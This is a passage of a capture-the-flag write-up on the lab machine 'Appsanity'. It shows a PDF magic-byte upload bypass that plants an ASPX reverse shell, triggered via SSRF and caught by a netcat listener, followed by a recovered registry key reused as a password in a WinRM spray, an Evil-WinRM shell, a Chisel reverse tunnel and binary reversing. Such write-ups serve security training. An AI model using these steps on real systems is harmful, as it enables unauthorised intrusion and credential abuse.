As this is a .NET webserver, I would like to upload an ASPX webshell and see if I can trigger it via the SSRF. I'll upload my PDF again, and get that request into Repeater. I've observed that the filename it gets saved as seems to prepend some data but then end in _[original file name]
. My first question is if I can change the file extension to .aspx
and get it to still upload. I’ll not change the payload, but only the form data filename
:
The response looks just like the unmodified request! I’ll use the SSRF to load http://127.0.0.1:8080
and see that the file does exist at the .aspx
extension. I can pull the file too:
Back in the Repeater tab submitting the PDF, I’ll try to remove the PDF body and replace it with text. If I remove the entire thing and just have “0xdf was here”, it still looks successful:
But the file isn’t there with the SSRF.
However, if I leave the start of the PDF (the “magic bytes”) and replace the body with my text like this:
Then there is a new link, and I can fetch it over the SSRF:
So the webserver seems to be validating the file based on the magic bytes.
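That check can be satisfied by a trivial polyglot: keep a %PDF- prefix and put the ASPX source after it. A small sketch (the validation function is my guess at what the server does, not its actual code):

```python
PDF_MAGIC = b"%PDF-1.7\n"  # any %PDF- prefix is enough for a magic-byte check

def make_fake_pdf(payload: bytes, path: str) -> None:
    """Write the PDF magic bytes followed by an arbitrary (e.g. ASPX) body."""
    with open(path, "wb") as f:
        f.write(PDF_MAGIC + payload)

def looks_like_pdf(path: str) -> bool:
    """Naive validation of the kind the server appears to perform."""
    with open(path, "rb") as f:
        return f.read(5) == b"%PDF-"

make_fake_pdf(b'<%@ Page Language="C#" %> ...webshell body...', "report.aspx")
assert looks_like_pdf("report.aspx")
```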
I’ll grab an ASPX reverse shell from GitHub, and put it in place of my text, making sure to update the callback IP and port. To make things easier, I’ll update the patient name to “reverseshell” (spaces break it). I’ll upload it, and fetch the admin page via the SSRF in the web browser:
The report link is https://portal.meddigi.htb/ViewReport.aspx?file=887947b0-f4ba-4939-8181-7d9d195b7d21_dummy.aspx
, so I’ll update my SSRF trigger in Repeater (with nc
listening):
When I send, it just hangs, but a few seconds later at nc
:
oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.238 62885
Spawn Shell...
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv> whoami
appsanity\svc_exampanel
The user flag is on the svc_exampanel user's desktop:
c:\Users\svc_exampanel\Desktop> type user.txt
1198a84a************************
Running powershell
converts this shell from cmd
to powershell
, which is also nice.
There are a handful of other users on the box:
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/18/2023 6:08 PM Administrator
d----- 9/24/2023 11:16 AM devdoc
d-r--- 9/15/2023 6:59 AM Public
d----- 10/18/2023 6:40 PM svc_exampanel
d----- 10/17/2023 3:05 PM svc_meddigi
d----- 10/18/2023 7:10 PM svc_meddigiportal
The svc_exampanel user can’t access any of these directories.
The net user
command gives similar results:
PS C:\Users> net user
User accounts for \\APPSANITY
-------------------------------------------------------------------------------
Administrator DefaultAccount devdoc
Guest svc_exampanel svc_meddigi
svc_meddigiportal WDAGUtilityAccount
The command completed successfully.
The C:\inetpub
directory has the IIS-related files:
PS C:\inetpub> ls
Directory: C:\inetpub
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2023 7:22 AM custerr
d----- 3/1/2024 1:14 PM Databases
d----- 9/24/2023 8:49 AM ExaminationPanel
d----- 10/23/2023 12:41 PM history
d----- 9/15/2023 7:24 AM logs
d----- 9/24/2023 8:50 AM MedDigi
d----- 9/24/2023 9:15 AM MedDigiPortal
d----- 9/15/2023 7:22 AM temp
d----- 9/16/2023 9:58 AM wwwroot
My guess is that MedDigi
is the main site, MedDigiPortal
is the portal site, and ExaminationPanel
is the private site on 8080. This user can’t access the other sites.
In ExaminationPanel
, there’s another directory of the same name, which has:
PS C:\inetpub\ExaminationPanel\ExaminationPanel> ls
Directory: C:\inetpub\ExaminationPanel\ExaminationPanel
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/26/2023 7:30 AM bin
d----- 3/1/2024 1:45 PM Reports
d----- 3/1/2024 1:10 PM tmp
-a---- 9/24/2023 8:46 AM 409 Error.aspx
-a---- 9/24/2023 8:46 AM 105 Global.asax
-a---- 9/24/2023 8:46 AM 1863 Index.aspx
-a---- 9/24/2023 8:46 AM 363 ViewReport.aspx
-a---- 10/18/2023 7:03 PM 2883 Web.config
Reports
has the uploaded reports (though my webshell has been cleaned up, presumably by some HTB cleanup script).
bin
has the executables that run the site:
PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> ls
Directory: C:\inetpub\ExaminationPanel\ExaminationPanel\bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2023 8:49 AM roslyn
d----- 9/24/2023 8:49 AM x64
d----- 9/24/2023 8:49 AM x86
-a---- 9/24/2023 8:46 AM 4991352 EntityFramework.dll
-a---- 9/24/2023 8:46 AM 591752 EntityFramework.SqlServer.dll
-a---- 9/24/2023 8:46 AM 13824 ExaminationManagement.dll
-a---- 9/24/2023 8:46 AM 40168 Microsoft.CodeDom.Providers.DotNetCompilerPlatform.dll
-a---- 9/24/2023 8:46 AM 431792 System.Data.SQLite.dll
-a---- 9/24/2023 8:46 AM 206512 System.Data.SQLite.EF6.dll
-a---- 9/24/2023 8:46 AM 206520 System.Data.SQLite.Linq.dll
All but one of these, if I search for them, return references to frameworks for web development in .NET. ExaminationManagement.dll
is custom to Appsanity.
I’ll start an SMB server on my host using Impacket’s smbserver.py
:
oxdf@hacky$ smbserver.py -smb2support -username oxdf -password oxdf share `pwd`
Impacket v0.10.1.dev1+20230608.100331.efc6a1c3 - Copyright 2022 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Now on Appsanity I'll connect to the share and copy the file into it:
PS C:\> net use \\10.10.14.6\share /u:oxdf oxdf
The command completed successfully.
PS C:\> copy \inetpub\ExaminationPanel\ExaminationPanel\bin\examinationManagement.dll \\10.10.14.6\share\
I’ve got the file on my system:
oxdf@hacky$ file ExaminationManagement.dll
ExaminationManagement.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
My tool of choice at the moment for reversing .NET binaries is DotPeek, though if I wanted to stay on a Linux VM I could use ILSpy.
I’ll open it up, and take a look:
Looking at index
, there are functions related to encryption / decryption:
RetrieveEncryptionKeyFromRegistry
is an interesting-sounding function:
private string RetrieveEncryptionKeyFromRegistry()
{
try
{
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\MedDigi"))
{
if (registryKey == null)
{
ErrorLogger.LogError("Registry Key Not Found");
this.Response.Redirect("Error.aspx?message=error+occurred");
return (string) null;
}
object obj = registryKey.GetValue("EncKey");
if (obj != null)
return obj.ToString();
ErrorLogger.LogError("Encryption Key Not Found in Registry");
this.Response.Redirect("Error.aspx?message=error+occurred");
return (string) null;
}
}
catch (Exception ex)
{
ErrorLogger.LogError("Error Retrieving Encryption Key", ex);
this.Response.Redirect("Error.aspx?message=error+occurred");
return (string) null;
}
}
It reads from the Local Machine
hive the key Software\MedDigi
, getting the value EncKey
.
In PowerShell, I can enter registry hives like drives with directories:
PS C:\inetpub> cd hklm:\Software\MedDigi
PS HKLM:\Software\MedDigi>
Get-ItemProperty
will show the values of this key:
PS HKLM:\Software\MedDigi> Get-ItemProperty .
EncKey : 1g0tTh3R3m3dy!!
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software\MedDigi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software
PSChildName : MedDigi
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
The EncKey
is “1g0tTh3R3m3dy!!”.
To check if any known user on this box uses this value as their password, I'll save all the users from net user
in a file on my host and spray with NetExec. SMB isn’t accessible, but I can try WinRM:
oxdf@hacky$ netexec winrm meddigi.htb -u users -p '1g0tTh3R3m3dy!!' --continue-on-success
WINRM 10.10.11.238 5985 APPSANITY [*] Windows 10 / Server 2019 Build 19041 (name:APPSANITY) (domain:Appsanity)
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\Administrator:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\DefaultAccount:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [+] Appsanity\devdoc:1g0tTh3R3m3dy!! (Pwn3d!)
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\Guest:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\svc_exampanel:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\svc_meddigi:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\svc_meddigiportal:1g0tTh3R3m3dy!!
WINRM 10.10.11.238 5985 APPSANITY [-] Appsanity\WDAGUtilityAccount:1g0tTh3R3m3dy!!
I like --continue-on-success
to see if multiple users share the password. It works for devdoc, and gets a shell with Evil-WinRM:
oxdf@hacky$ evil-winrm -i meddigi.htb -u devdoc -p '1g0tTh3R3m3dy!!'
Evil-WinRM shell v3.4
*Evil-WinRM* PS C:\Users\devdoc\Documents>
In looking around the host, I’ll notice there are a bunch more ports listening than the three I can connect to from my host:
*Evil-WinRM* PS C:\Users\devdoc\Documents> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:100 0.0.0.0:0 LISTENING 4880
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 1280
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 692
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 532
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1116
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1528
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 10.10.11.238:139 0.0.0.0:0 LISTENING 4
TCP 10.10.11.238:5985 10.10.14.6:44310 ESTABLISHED 4
TCP 10.10.11.238:62885 10.10.14.6:443 ESTABLISHED 4480
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 924
TCP [::]:443 [::]:0 LISTENING 4
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8080 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 692
TCP [::]:49665 [::]:0 LISTENING 532
TCP [::]:49666 [::]:0 LISTENING 1116
TCP [::]:49667 [::]:0 LISTENING 1528
TCP [::]:49668 [::]:0 LISTENING 668
UDP 0.0.0.0:123 *:* 5992
UDP 0.0.0.0:5050 *:* 1280
UDP 0.0.0.0:5353 *:* 1948
UDP 0.0.0.0:5355 *:* 1948
UDP 10.10.11.238:137 *:* 4
UDP 10.10.11.238:138 *:* 4
UDP 10.10.11.238:1900 *:* 3332
UDP 10.10.11.238:65138 *:* 3332
UDP 127.0.0.1:1900 *:* 3332
UDP 127.0.0.1:49664 *:* 2024
UDP 127.0.0.1:65139 *:* 3332
UDP [::]:123 *:* 5992
UDP [::1]:1900 *:* 3332
UDP [::1]:65137 *:* 3332
Before I start pinging SMB and LDAP, port 100 jumps out as unusual. The output above shows this as PID 4880, which I can get from the process list if I’m fast:
*Evil-WinRM* PS C:\Users\devdoc\Documents> get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
76 5 2976 4140 2312 0 cmd
134 9 4196 1656 688 0 conhost
113 8 6336 10932 780 0 conhost
134 9 4528 1504 1020 0 conhost
134 9 4200 2968 4948 0 conhost
552 22 1772 5420 424 0 csrss
177 10 1604 4968 540 1 csrss
122 7 1128 5620 2828 0 dasHost
262 14 3916 14348 3668 0 dllhost
698 29 26664 56896 60 1 dwm
36 5 1456 3760 820 0 fontdrvhost
36 5 1480 3752 828 1 fontdrvhost
0 0 60 8 0 0 Idle
748 39 20076 66328 3488 1 LogonUI
1141 23 5804 17496 692 0 lsass
0 0 276 4496 1596 0 Memory Compression
210 13 2044 4060 1996 0 MicrosoftEdgeUpdate
230 13 2972 10860 4136 0 msdtc
437 16 4424 17656 2808 0 MsMpEng
1467 27 115832 126996 900 0 powershell
418 36 112660 6764 2332 0 powershell
554 40 132664 23448 2344 0 powershell
433 38 118200 6680 2352 0 powershell
0 13 2972 20392 92 0 Registry
143 9 1424 6908 4880 0 ReportManagement
190 11 2620 12368 896 0 SearchFilterHost
794 66 33888 42148 3196 0 SearchIndexer
360 14 2800 11152 1984 0 SearchProtocolHost
589 11 5084 10212 668 0 services
106 8 4180 7436 2956 0 SgrmBroker
53 3 1056 1152 320 0 smss
269 13 3376 11616 348 0 svchost
112 7 1240 5500 404 0 svchost
187 11 1812 8592 748 0 svchost
126 7 1288 6044 756 0 svchost
1507 16 10456 20680 800 0 svchost
822 17 18664 25340 924 0 svchost
234 9 2052 7592 972 0 svchost
124 7 2248 7540 1008 0 svchost
197 13 1904 8912 1016 0 svchost
254 7 1444 6364 1072 0 svchost
347 13 12392 16560 1116 0 svchost
124 15 3096 7480 1200 0 svchost
121 8 1392 7440 1260 0 svchost
316 19 4280 17212 1280 0 svchost
207 9 2072 7444 1328 0 svchost
224 12 2912 12116 1400 0 svchost
426 9 2900 9184 1412 0 svchost
191 10 2348 9720 1440 0 svchost
118 7 1208 5908 1468 0 svchost
393 17 6196 16056 1528 0 svchost
389 13 4068 11940 1576 0 svchost
130 8 1308 6000 1648 0 svchost
147 9 1552 7824 1716 0 svchost
158 10 1892 8516 1732 0 svchost
420 12 2884 10056 1808 0 svchost
189 15 5996 9876 1820 0 svchost
191 10 1876 8588 1888 0 svchost
251 12 2780 8380 1948 0 svchost
130 9 1556 6684 1956 0 svchost
362 12 2200 9908 1972 0 svchost
365 15 2724 11012 2024 0 svchost
407 32 10680 20024 2056 0 svchost
186 11 2068 8672 2132 0 svchost
176 10 1920 8968 2180 0 svchost
164 9 1948 7784 2208 0 svchost
169 12 3984 11444 2456 0 svchost
241 25 3304 12924 2464 0 svchost
130 7 1272 6432 2480 0 svchost
457 24 21240 37188 2500 0 svchost
321 18 22452 29548 2516 0 svchost
419 17 11764 22144 2536 0 svchost
133 9 1576 7000 2616 0 svchost
128 7 1248 5796 2632 0 svchost
209 12 2460 9640 2648 0 svchost
199 11 2840 16000 2724 0 svchost
251 15 4768 12860 2740 0 svchost
208 12 1944 7640 2868 0 svchost
105 7 1232 5640 2912 0 svchost
336 20 5940 24004 2932 0 svchost
400 26 3620 14176 3164 0 svchost
231 14 2092 7836 3332 0 svchost
210 12 2860 10832 3560 0 svchost
162 10 1832 7660 3596 0 svchost
261 8 1616 7720 4072 0 svchost
206 11 1884 8664 4292 0 svchost
216 13 2932 12128 4380 0 svchost
442 27 9128 18364 4384 0 svchost
131 8 6688 14344 4392 0 svchost
230 14 5048 17672 4544 0 svchost
181 10 3372 7696 4860 0 svchost
169 11 2572 13748 5448 0 svchost
244 14 3252 13332 5460 0 svchost
255 19 3204 12376 5576 0 svchost
204 12 1728 7724 5992 0 svchost
211 11 2480 11344 6000 0 svchost
1849 0 196 112 4 0 System
170 11 2868 11220 2640 0 VGAuthService
118 7 1440 6260 2688 0 vm3dservice
116 8 1516 6672 3044 1 vm3dservice
113 8 1436 6588 3940 1 vm3dservice
395 22 10904 22676 2664 0 vmtoolsd
895 59 233804 227904 4480 0 w3wp
164 11 1372 7176 532 0 wininit
246 13 2772 19988 600 1 winlogon
360 17 132784 141760 3964 0 WmiPrvSE
863 28 59708 74808 0.81 2272 0 wsmprovhost
The process seems to be restarting quickly, so I’ll write a single line of PowerShell to get the process id and then pull the process information:
*Evil-WinRM* PS C:\Users\devdoc\Documents> Get-Process -Id (netstat -ano | findstr 100 | select-string -pattern '\s+(\d+)$').Matches.Groups[1].Value
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
143 10 1500 6952 296 0 ReportManagement
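The same lookup can be sketched in Python for clarity. This is a hedged illustration of the idea behind that pipeline (parsing `netstat -ano`-style output to map a listening TCP port to its PID), not something run on the box:

```python
import re

def pid_for_port(netstat_output, port):
    """Return the PID listening on the given TCP port in
    `netstat -ano`-style output, or None if not found."""
    # Lines look like: "  TCP  0.0.0.0:100  0.0.0.0:0  LISTENING  4880"
    pattern = re.compile(
        r"^\s*TCP\s+\S+:{}\s+\S+\s+LISTENING\s+(\d+)\s*$".format(port),
        re.MULTILINE,
    )
    match = pattern.search(netstat_output)
    return int(match.group(1)) if match else None

sample = """
  TCP    0.0.0.0:80     0.0.0.0:0    LISTENING    4
  TCP    0.0.0.0:100    0.0.0.0:0    LISTENING    4880
"""
print(pid_for_port(sample, 100))  # 4880
```

Anchoring the port with the colon before it and whitespace after avoids false matches like 49100 or 1000 that a bare `findstr 100` would pick up.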
The process listening on port 100 is ReportManagement. There’s a directory in C:\Program Files\ named ReportManagement:
*Evil-WinRM* PS C:\Program Files> ls
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2023 7:36 AM Common Files
d----- 9/15/2023 8:16 AM dotnet
d----- 9/15/2023 8:16 AM IIS
d----- 10/23/2023 12:17 PM Internet Explorer
d----- 9/17/2023 3:23 AM Microsoft Update Health Tools
d----- 12/7/2019 1:14 AM ModifiableWindowsApps
d----- 10/20/2023 12:42 PM ReportManagement
d----- 10/23/2023 4:59 PM RUXIM
d----- 9/15/2023 7:36 AM VMware
d----- 10/23/2023 12:17 PM Windows Defender
d----- 10/23/2023 12:17 PM Windows Defender Advanced Threat Protection
d----- 10/23/2023 12:17 PM Windows Mail
d----- 12/7/2019 1:54 AM Windows Multimedia Platform
d----- 12/7/2019 1:50 AM Windows NT
d----- 10/23/2023 12:17 PM Windows Photo Viewer
d----- 12/7/2019 1:54 AM Windows Portable Devices
d----- 12/7/2019 1:31 AM Windows Security
d----- 12/7/2019 1:31 AM WindowsPowerShell
*Evil-WinRM* PS C:\Program Files> cd ReportManagement
*Evil-WinRM* PS C:\Program Files\ReportManagement> ls
Directory: C:\Program Files\ReportManagement
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2023 11:33 AM Libraries
-a---- 5/5/2023 5:21 AM 34152 cryptbase.dll
-a---- 5/5/2023 5:21 AM 83744 cryptsp.dll
-a---- 3/11/2021 9:22 AM 564112 msvcp140.dll
-a---- 9/17/2023 3:54 AM 140512 profapi.dll
-a---- 10/20/2023 2:56 PM 102912 ReportManagement.exe
-a---- 10/20/2023 1:47 PM 11492864 ReportManagementHelper.exe
-a---- 3/11/2021 9:22 AM 96144 vcruntime140.dll
-a---- 3/11/2021 9:22 AM 36752 vcruntime140_1.dll
-a---- 5/5/2023 5:21 AM 179248 wldp.dll
All of this enumeration could have been done as svc_exampanel, but it’s worth noting that that user couldn’t read this binary:
*Evil-WinRM* PS C:\Program Files\ReportManagement> icacls ReportManagement.exe
ReportManagement.exe APPSANITY\devdoc:(DENY)(W,X)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
APPSANITY\devdoc:(R)
Successfully processed 1 files; Failed processing 0 files
While looking at permissions in this directory, I’ll notice that the Libraries
directory is owned by devdoc:
*Evil-WinRM* PS C:\Program Files\ReportManagement>icacls Libraries
Libraries APPSANITY\devdoc:(OI)(CI)(RX,W)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(R)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
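To decode the icacls output above, here’s a quick (non-exhaustive) reference for the flags, sketched as a Python lookup:

```python
# Meanings of the icacls permission and inheritance flags seen above
# (simplified; `icacls /?` documents the full list).
RIGHTS = {
    "F": "full access",
    "M": "modify",
    "RX": "read and execute",
    "R": "read-only",
    "W": "write-only",
    "X": "execute",
}
INHERITANCE = {
    "OI": "object inherit (files under this directory get the ACE)",
    "CI": "container inherit (subdirectories get the ACE)",
    "IO": "inherit only (doesn't apply to this object itself)",
    "I": "inherited from the parent container",
}

def decode(ace):
    """Decode a string like '(OI)(CI)(RX,W)' into words."""
    parts = []
    for flag in ace.strip("()").split(")("):
        for item in flag.split(","):
            parts.append(RIGHTS.get(item) or INHERITANCE.get(item) or item)
    return ", ".join(parts)

print(decode("(OI)(CI)(RX,W)"))
```

So devdoc’s `(OI)(CI)(RX,W)` on Libraries means read, execute, and write on the directory and everything created under it.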
It is currently empty, which is suspicious. devdoc cannot access the ReportManagementHelper.exe binary:
*Evil-WinRM* PS C:\Program Files\ReportManagement> icacls ReportManagementHelper.exe
Successfully processed 0 files; Failed processing 1 files
icacls.exe : ReportManagementHelper.exe: Access is denied.
+ CategoryInfo : NotSpecified: (ReportManagemen...cess is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Trying to interact with the binary doesn’t work over HTTP or HTTPS:
*Evil-WinRM* PS C:\Program Files\ReportManagement> curl http://localhost:100
The server committed a protocol violation. Section=ResponseStatusLine
At line:1 char:1
+ curl http://localhost:100
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
*Evil-WinRM* PS C:\Program Files\ReportManagement> curl https://localhost:100
The underlying connection was closed: An unexpected error occurred on a send.
At line:1 char:1
+ curl https://localhost:100
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
I’ll start the Chisel server on my VM and upload the Windows binary to Appsanity to get a tunnel to localhost:
*Evil-WinRM* PS C:\programdata> upload /opt/chisel/chisel_1.9.1_windows_amd64 \programdata\c.exe
Info: Uploading /opt/chisel/chisel_1.9.1_windows_amd64 to \programdata\c.exe
Data: 12008104 bytes of 12008104 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> .\c.exe client 10.10.14.6:8000 R:10000:127.0.0.1:100
c.exe : 2024/03/02 03:44:29 client: Connecting to ws://10.10.14.6:8000
+ CategoryInfo : NotSpecified: (2024/03/02 03:4...10.10.14.6:8000:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2024/03/02 03:44:30 client: Connected (Latency 97.2358ms)
There’s an error, but my server shows the tunnel:
oxdf@hacky$ ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse
2024/03/02 06:37:42 server: Reverse tunnelling enabled
2024/03/02 06:37:42 server: Fingerprint ds0r8UB0J6WEjmcpLmdcmd7E4Y2D8azZsiBUTmwDJf0=
2024/03/02 06:37:42 server: Listening on http://0.0.0.0:8000
2024/03/02 06:44:27 server: session#18: tun: proxy#R:10000=>100: Listening
And I can interact with it over nc:
oxdf@hacky$ nc localhost 10000
Reports Management administrative console. Type "help" to view available commands.
help shows the commands:
help
Available Commands:
backup: Perform a backup operation.
validate: Validates if any report has been altered since the last backup.
recover <filename>: Restores a specified file from the backup to the Reports folder.
upload <external source>: Uploads the reports to the specified external source.
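Rather than driving the console through nc, a line-based TCP service like this can also be scripted. A minimal sketch (assuming the Chisel tunnel on localhost:10000 from above):

```python
import socket

def console_cmd(host, port, command, timeout=5):
    """Connect to a line-based TCP console, read the banner,
    send one command, and return (banner, reply)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(4096).decode(errors="replace")  # greeting line
        s.sendall(command.encode() + b"\n")
        reply = s.recv(4096).decode(errors="replace")
    return banner, reply

# e.g.: banner, reply = console_cmd("localhost", 10000, "validate")
```

This is handy later for triggering commands repeatedly while watching ProcMon.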
I can try some of the commands, but nothing too interesting:
backup
Backup operation completed successfully.
validate
Validation completed. All reports are intact.
recover \users\administator\desktop\root.txt
Specified file not found in the backup directory.
upload 10.10.14.6
Failed to upload to external source.
There’s no connection back to my host that I can see from the upload command.
I’ll copy all the files that I can back to my host using SMB again. As noted above, devdoc doesn’t have read access to ReportManagementHelper.exe.
oxdf@hacky$ file *
cryptbase.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
cryptsp.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
Libraries: directory
msvcp140.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
profapi.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
ReportManagement.exe: PE32+ executable (GUI) x86-64, for MS Windows
vcruntime140_1.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
vcruntime140.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
wldp.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows
These are not .NET binaries, so I’ll use Ghidra, starting with ReportManagement.exe. Looking at the strings to get oriented, there are a bunch of interesting ones, all grouped together in memory, along with where they are referenced:
There are a couple of references to upload. There’s a reference to the binary I can’t access, ReportManagementHelper, and to cmd.exe. There’s the writable Libraries directory. And “externalupload” and “dll”. Each of these strings is used in FUN_1400042b0.
This function is huge, and the decompile from Ghidra is a mess, weighing in at 2,212 lines. After 317 lines of variable declarations, there’s a reference to reportmanagement_log.txt, and then it enters a do/while loop starting at line 340 of my Ghidra output:
There is a call to CreateProcessW shortly after the reference to ReportManagementHelper.exe, which makes sense, as the main binary would need to launch the helper:
I’ll copy all the files I have to my Windows VM in a folder on my Desktop. I’ll also start Process Monitor (or ProcMon) running to collect events.
When I run ReportManagement.exe, it creates a reportmanagement_log.txt file in ~/logs. This file shows an error that it failed to find a directory:
It’s not important to find this log, as I would also find this using ProcMon. I’ll also note that the process runs in the background and listens on TCP 100 (notice the PID matches) just like on Appsanity:
PS C:\Users\0xdf > Get-Process -name ReportManagement
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
121 9 1428 7348 0.05 4008 1 ReportManagement
PS C:\Users\0xdf > netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:100 0.0.0.0:0 LISTENING 4008
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 988
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 620
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 1744
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 736
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 584
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1204
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1244
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2584
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 2824
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 724
TCP 10.0.2.15:139 0.0.0.0:0 LISTENING 4
TCP 10.0.2.15:53446 204.79.197.239:443 FIN_WAIT_2 5548
TCP [::]:135 [::]:0 LISTENING 988
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 1744
TCP [::]:49664 [::]:0 LISTENING 736
TCP [::]:49665 [::]:0 LISTENING 584
TCP [::]:49666 [::]:0 LISTENING 1204
TCP [::]:49667 [::]:0 LISTENING 1244
TCP [::]:49668 [::]:0 LISTENING 2584
TCP [::]:49669 [::]:0 LISTENING 2824
TCP [::]:49670 [::]:0 LISTENING 724
UDP 0.0.0.0:500 *:* 2816
UDP 0.0.0.0:4500 *:* 2816
UDP 0.0.0.0:5050 *:* 620
UDP 0.0.0.0:5353 *:* 2232
UDP 0.0.0.0:5355 *:* 2232
UDP 10.0.2.15:137 *:* 4
UDP 10.0.2.15:138 *:* 4
UDP 10.0.2.15:1900 *:* 2172
UDP 10.0.2.15:54746 *:* 2172
UDP 127.0.0.1:1900 *:* 2172
UDP 127.0.0.1:52691 *:* 3124
UDP 127.0.0.1:54747 *:* 2172
UDP [::]:500 *:* 2816
UDP [::]:4500 *:* 2816
UDP [::1]:1900 *:* 2172
UDP [::1]:54745 *:* 2172
In ProcMon, I’ll set up a filter so that I only get events from ReportManagement.exe, and to start, I’ll look at attempts to interact with files that fail by filtering on CreateFile operations that result in anything but SUCCESS:
There’s a bunch of failures trying to open C:\inetpub\ExaminationPanel\ExaminationPanel\Reports:
The .exe.mun file is something related to resources, which I’ll ignore for now. I’ll run stop-process -name ReportManagement in PowerShell, create this directory, and run it again. This time it fails to find C:\Users\Administrator\Backup. I’ll create this as well. Now when I run it, there are no failures.
